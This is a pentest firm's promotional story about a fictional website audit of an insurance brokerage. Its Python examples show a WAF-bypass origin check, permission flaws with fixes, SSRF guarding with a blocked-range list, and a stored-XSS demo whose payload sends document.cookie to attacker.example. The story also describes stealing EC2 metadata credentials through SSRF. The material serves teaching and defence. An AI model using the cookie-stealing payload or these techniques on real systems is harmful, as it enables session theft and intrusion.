DSecBypass Lyon website security audit

Pentest stories

This series of articles follows Jean, an imaginary pentester, through his penetration testing engagements. The clients and the exploit stories are just as imaginary, but they match reality and are based on the experience of DSecBypass experts.

It aims to make the different pentest offerings easier to understand.


Website pentesting

Jean has a lot of experience in website pentesting: it is a scope that overlaps with external penetration tests and sometimes with internal security audits. What he likes most is finding logic flaws in a well-built application: the developers followed secure development best practices and used modern technologies, but did not anticipate certain use cases. This is when the exchanges with the customer’s teams are the most interesting, since they allow advanced subjects to be tackled. Still, Jean also enjoys a website coded in PHP ten years ago that ticks every box of the OWASP Top 10 🙂

Today, Jean has to audit the website of an insurance brokerage. The company developed a web application that lets employees easily manage clients and insurance contracts and export reports on various indicators. The scope consists of two URLs:

https://app[.]courtier.fictif/

https://admin-app[.]courtier.fictif/

The scenarios selected are:

    • a “Black box” scenario: the pentester only knows the scope of the engagement
    • a “Grey box” scenario: the auditor is given one or more accounts on the application in order to evaluate the permission model and test more features

For this pentest, Jean has two “employee” accounts and two “manager” accounts on https://app[.]courtier.fictif, and one “administrator” account on https://admin-app[.]courtier.fictif/.

He will thus be able to test the permission model vertically (can an employee become a manager?) and horizontally (can an employee access another employee’s data?). The administrator account will let him test the features that are only accessible to application administrators.

To follow the logic of the scenarios, the penetration test starts with the “black box” scenario: the pentester must have as little information as possible in order to simulate an unauthenticated attacker.

After checking the details of the mandate, Jean emails the mission contacts to notify them that testing is starting.

As in an external audit, two reconnaissance phases are carried out: passive reconnaissance, then active reconnaissance.

He checks the data accessible through search engines using dorks, and analyzes the available DNS and certificate data in order to widen the attack surface and gather as much information as possible.

Today he is lucky: the application, normally protected by a web application firewall (WAF), can be reached directly, without going through the WAF, using an IP address retrieved from the DNS history. He will therefore be able to run his tests without being blocked, and already has a first vulnerability to report.
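The check behind this finding, as an added example (not DSecBypass tooling): connect to the candidate origin IP while keeping the real hostname in SNI and in the Host header, then compare what comes back with the response obtained through the public name. The hostname, the IP 203.0.113.10 (a documentation range) and the list of WAF marker headers are assumptions.

```python
"""Check whether an origin IP found in DNS history answers directly, bypassing the WAF.

Added example, not DSecBypass tooling. The hostname, the candidate origin IP
(203.0.113.10, a documentation range) and the WAF marker headers are assumptions.
"""
import hashlib
import http.client
import re
import socket
import ssl

HOST = "app.courtier.fictif"        # assumed target hostname
CANDIDATE_ORIGIN = "203.0.113.10"   # assumed IP seen in DNS history

# Response headers that typically mean the request went through a WAF/CDN edge.
# Illustrative list: extend it with the product actually fronting the target.
WAF_MARKERS = ("cf-ray", "x-sucuri-id", "x-akamai-transformed")


def fetch(ip, host, path="/", verify=True, timeout=5):
    """GET `path` from `ip` with SNI and Host set to `host`.

    Connecting to the bare IP while presenting the real hostname in SNI and
    Host makes the origin serve the right virtual host. Returns
    (status, headers, body), or None if the IP does not answer.
    """
    ctx = ssl.create_default_context()
    if not verify:                      # origins often carry a default/self-signed cert
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    try:
        raw = socket.create_connection((ip, 443), timeout=timeout)
        tls = ctx.wrap_socket(raw, server_hostname=host)
    except OSError:
        return None
    conn = http.client.HTTPSConnection(host, timeout=timeout)
    conn.sock = tls                     # reuse our already-connected TLS socket
    conn.request("GET", path, headers={"Host": host, "User-Agent": "origin-check"})
    resp = conn.getresponse()
    result = (resp.status, dict(resp.getheaders()), resp.read())
    conn.close()
    return result


def fingerprint(body):
    """Cheap identity for a page: its <title> if present, else a body hash."""
    m = re.search(rb"<title[^>]*>(.*?)</title>", body, re.I | re.S)
    if m:
        return m.group(1).decode("utf-8", "replace").strip().lower()
    return hashlib.sha256(body).hexdigest()[:16]


def classify(front, direct):
    """Compare the response obtained via the public name (front, behind the WAF)
    with the one obtained from the candidate origin (direct).

    Returns 'unreachable', 'still-fronted' (the IP is just another WAF edge),
    'different-site' (another vhost or a default page) or 'bypass'.
    """
    if direct is None:
        return "unreachable"
    status, headers, body = direct
    lowered = {k.lower() for k in headers}
    if any(marker in lowered for marker in WAF_MARKERS):
        return "still-fronted"
    if status != front[0] or fingerprint(body) != fingerprint(front[2]):
        return "different-site"
    return "bypass"


if __name__ == "__main__":
    front = fetch(socket.gethostbyname(HOST), HOST)
    direct = fetch(CANDIDATE_ORIGIN, HOST, verify=False)
    if front is None:
        print("public name does not answer, nothing to compare against")
    else:
        print(f"{CANDIDATE_ORIGIN}: {classify(front, direct)}")
```

A 'bypass' verdict is worth reporting on its own: the fix is to restrict the origin's security group (or equivalent) to the WAF provider's address ranges, so that the history of a DNS record no longer matters.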

He launches his active reconnaissance tools: they scan the server ports looking for open services to attack, and begin enumerating the files, folders and applications exposed by the web servers.

These reconnaissance steps are crucial: they make it possible to find what the developers or system administrators did not realise they had made accessible. This often gives access to information that is useful for the rest of the audit, or even to less well-protected functionality.

In this case Jean discovers a file from the continuous deployment pipeline that reveals the versions of the libraries in use and discloses some internal names used by the client. It is a weakness that will be raised in the report, but above all one that may be useful in the rest of the audit.

Apart from this issue, Jean detects a configuration defect in the HTTP security headers and some libraries that are vulnerable but cannot be exploited as is. He spends a lot of time scanning the exposed APIs but finds no black box vulnerability. The application is therefore rather secure against an unauthenticated attacker: an anti-bruteforce mechanism protects the authentication form, Jean would have been blocked while enumerating folders and files had the WAF not been bypassed, and the modern technologies used are secure by design and have been used properly by the developers.

In contrast, authenticated testing reveals critical issues in the permission model:

  • an employee can list another employee’s contracts
  • a manager can modify the employee records of other managers
  • a manager can modify his own profile in order to gain access to folders that were not granted to him
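The three findings above on a toy model of the application, as an added example (not the audited application’s code): each route is shown as Jean found it, with the object identifier and the posted fields trusted, and then hardened by authorizing against the session user and allow-listing the writable fields. The users, contracts and the role, manager_id and folders attributes are constructed sample data.

```python
"""Permission-model checks on a toy version of the broker application.

Added example, not the audited application's code. Users, contracts and the
'role', 'manager_id' and 'folders' attributes are constructed sample data.
Each route appears as found (suffix _vuln) and then hardened.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class User:
    id: int
    role: str                          # "employee", "manager" or "admin"
    manager_id: Optional[int] = None   # employees report to one manager
    folders: set = field(default_factory=set)
    phone: str = ""


@dataclass
class Contract:
    id: int
    owner_id: int                      # employee handling the client


# Constructed sample data.
USERS = {
    1: User(1, "employee", manager_id=10, folders={"retail"}),
    2: User(2, "employee", manager_id=11, folders={"retail"}),
    10: User(10, "manager", folders={"retail"}),
    11: User(11, "manager", folders={"retail", "corporate"}),
}
CONTRACTS = [Contract(100, owner_id=1), Contract(200, owner_id=2)]


class Forbidden(Exception):
    pass


def is_denied(fn, *args):
    """True when the route refuses the call (what a pentester expects to see as a 403)."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


# ---- as found: the identifier in the URL and the posted fields are trusted ----

def list_contracts_vuln(session_user, employee_id):
    """Horizontal flaw: employee_id comes from the request and is never compared
    with the session, so any employee can read a colleague's contracts."""
    return [c.id for c in CONTRACTS if c.owner_id == employee_id]


def update_employee_vuln(session_user, employee_id, payload):
    """Horizontal flaw between managers: any manager can edit any employee."""
    target = USERS[employee_id]
    for key, value in payload.items():
        setattr(target, key, value)
    return target


def update_profile_vuln(session_user, payload):
    """Vertical flaw (mass assignment): every posted field is copied onto the
    user, so a manager can send {"role": "admin"} or extend his own folders."""
    for key, value in payload.items():
        setattr(session_user, key, value)
    return session_user


# ---- hardened: authorize against the session, allow-list writable fields ----

EMPLOYEE_EDITABLE = {"phone", "folders"}   # what a manager may set on his staff
SELF_EDITABLE = {"phone"}                   # what a user may set on himself


def can_manage(actor, target):
    """Admins see everyone; a user sees himself; a manager sees his own staff."""
    if actor.role == "admin" or actor.id == target.id:
        return True
    return actor.role == "manager" and target.manager_id == actor.id


def list_contracts(session_user, employee_id):
    target = USERS.get(employee_id)
    if target is None or not can_manage(session_user, target):
        raise Forbidden(f"user {session_user.id} may not view employee {employee_id}")
    return [c.id for c in CONTRACTS if c.owner_id == employee_id]


def apply_fields(target, payload, allowed):
    """Reject the whole request if it carries a field outside the allow-list
    rather than silently dropping it: a silent drop hides probing from the logs."""
    extra = set(payload) - allowed
    if extra:
        raise Forbidden(f"fields not writable here: {sorted(extra)}")
    for key, value in payload.items():
        setattr(target, key, value)
    return target


def update_employee(session_user, employee_id, payload):
    target = USERS.get(employee_id)
    if (target is None or target.role != "employee"
            or session_user.role not in ("manager", "admin")
            or not can_manage(session_user, target)):
        raise Forbidden(f"user {session_user.id} may not edit user {employee_id}")
    return apply_fields(target, payload, EMPLOYEE_EDITABLE)


def update_profile(session_user, payload):
    return apply_fields(session_user, payload, SELF_EDITABLE)
```

In a grey box test this is exactly the matrix Jean walks through with his four accounts: every route that takes an identifier is replayed with the other employee’s and the other manager’s session, and every write route is replayed with extra fields (role, folders, manager_id) in the body.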

Jean also discovers a stored XSS vulnerability in the names of some attachments: an employee can inject malicious JavaScript that runs in a manager’s browser.
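What that finding looks like in code, as an added example (not the audited application’s code): the attachment list rendered with the stored name concatenated into the HTML, beside the same row with output encoding, plus an upload-time sanitizer as defence in depth. The payload, the attacker host and the row layout are constructed.

```python
"""Stored XSS through attachment names: the rendering as found, and the fix.

Added example, not the audited application's code. The uploaded file name, the
attacker host and the table row format are constructed.
"""
import html
import re

# Constructed payload: what an employee uploads. The name is stored verbatim
# and later rendered in the manager's attachment list.
UPLOADED_NAME = ('contrat<img src=x onerror="fetch(\'https://attacker.example/?c=\''
                 '+document.cookie)">.pdf')


def render_attachment_row_vuln(att_id, name):
    """As found: the stored name is concatenated straight into the HTML, so the
    <img onerror=...> runs in whoever opens the list (here, the manager)."""
    return f'<tr><td><a href="/attachments/{att_id}">{name}</a></td></tr>'


def render_attachment_row(att_id, name):
    """Fix: encode for the HTML text context at output time. The identifier is
    coerced to int so it cannot break out of the href either."""
    return (f'<tr><td><a href="/attachments/{int(att_id)}">'
            f'{html.escape(name, quote=True)}</a></td></tr>')


def sanitize_filename(name, max_len=120):
    """Defence in depth at upload time: drop any path component and keep a
    conservative character set. Output encoding stays the primary fix, since the
    stored name also ends up in CSV exports, e-mails and logs."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    base = re.sub(r"[^A-Za-z0-9._ -]", "_", base).strip(" .")
    return (base or "attachment")[:max_len]
```

The same name will typically be reflected in more than one place (the list, the detail page, the download’s Content-Disposition header, an export), and each context needs its own encoding; a sanitizer alone would leave the existing rows in the database as they are.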

The administration interface is, as is often the case, less well protected and offers more sensitive features. Jean discovers several XSS injections there. A feature for configuring a shared folder catches his attention: he creates a new one and points it at his own server. He receives the request, which indicates an SSRF vulnerability, and also notices that the application displays the response returned by his server. Since the application is hosted on AWS, Jean exploits the SSRF to retrieve the EC2 instance metadata, then uses his favorite tools to exploit the AWS credentials obtained this way. Although the instance is not sufficiently hardened, since IMDSv2 is not enforced, the developers assigned a limited IAM role to the EC2 instance, which does not allow taking control of the AWS account.
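The server-side check that the shared-folder feature was missing, as an added example (not the audited application’s code): a validator for the user-supplied URL that refuses non-HTTP schemes, credentials, unusual ports and any address in a private or link-local range, including the instance metadata endpoint. The allowed schemes and ports, the resolver hook and the address 203.0.113.5 (documentation range) are assumptions.

```python
"""Guarding the 'shared folder' URL against SSRF, with the instance metadata
service as the case that matters on AWS.

Added example, not the audited application's code. The allowed schemes and
ports, the resolver hook and the address 203.0.113.5 (documentation range)
are assumptions.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Ranges a server-side fetch must never reach. 169.254.0.0/16 covers the AWS
# metadata endpoint 169.254.169.254; fc00::/7 covers its IPv6 twin fd00:ec2::254.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked_ip(ip):
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped:    # ::ffff:169.254.169.254 and friends
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETS)


def validate_target(url, resolver=socket.gethostbyname):
    """Return (ok, reason) for a user-supplied folder URL.

    The host is resolved here and the address checked. The fetch that follows
    must then connect to the validated IP rather than resolve the name again,
    otherwise a DNS rebinding between the two lookups reopens the hole.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ips = [str(ipaddress.ip_address(host))]    # literal address, v4 or v6
    except ValueError:
        try:
            ips = [resolver(host)]
        except OSError:
            return False, f"cannot resolve {host!r}"
    for ip in ips:
        if is_blocked_ip(ip):
            return False, f"{ip} is in a blocked range"
    return True, "ok"
```

Two points from the story map onto this. First, the SSRF here was a plain GET whose response was echoed back, which is all IMDSv1 needs; IMDSv2 requires a PUT to /latest/api/token carrying the X-aws-ec2-metadata-token-ttl-seconds header before any metadata can be read, so enforcing it on the instance (`aws ec2 modify-instance-metadata-options --http-tokens required`) would have stopped the credential theft even with the application flaw in place. Second, the limited IAM role is what contained the impact, which is the argument for scoping instance roles to the few API calls the application actually makes.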

Once the security audit is complete, he informally gives the client a summary of the results by phone.

📚 The next day he completes his audit report and sends it to a colleague for proofreading and validation.

He then sends the report to the client through a secure channel, and discusses the results of the website security audit and the action plan with the teams and management during the restitution meeting, held by videoconference.

🛡️ DSecBypass supports you in your website security audits, with quality services and significant experience in this type of engagement. Do not hesitate to contact us for additional information and/or a personalized quote 📝.